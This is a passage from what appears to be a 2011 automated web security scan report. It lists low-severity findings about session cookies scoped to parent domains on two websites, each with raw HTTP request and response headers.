HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:48 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=at9kctjodfv3r3iam6cs56aqf7; expires=Tue, 26-Apr-2011 23:55:48 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.4. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Penetration-Testing/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=t5s0kmeibbbtts6cq9hfdffs02; expires=Tue, 26-Apr-2011 23:55:49 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.5. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Vulnerability-Scan-Services/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:47 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=bk4mm1ag6ue392h3jsauk88r25; expires=Tue, 26-Apr-2011 23:55:47 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 23560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.6. http://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:25:33 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=o07bfks454r08e1ev5t4uf6is4; expires=Wed, 27-Apr-2011 00:25:33 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Tue, 03 May 2011 00:25:33 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 190
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'http://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           

14.7. http://www.hugthecloud.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...

14.8. http://www.hugthecloud.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path: